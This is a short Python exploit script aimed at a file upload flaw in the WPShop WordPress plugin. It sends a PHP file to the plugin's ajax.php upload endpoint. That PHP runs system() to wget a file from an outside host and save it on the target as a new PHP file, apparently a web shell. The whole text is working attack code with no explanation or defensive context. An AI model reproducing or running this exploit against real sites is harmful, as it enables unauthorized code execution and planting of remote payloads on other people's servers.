Exploit Wordpress Plugins WPShop File Upload Vulnerability

1. import requests
2. from StringIO import StringIO
3. s = requests.session()
4. target = 'http://localhost/'
5.  
6. url = '%s/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload'%target
7. files = {
8.  "wpshop_file":("out.php",StringIO("<?php system('wget http://yuyudhn1337.org/exp/priv.txt -O njepat.php');"))
9. }
10. r = s.post(url, files=files)
11.  
12. print r.text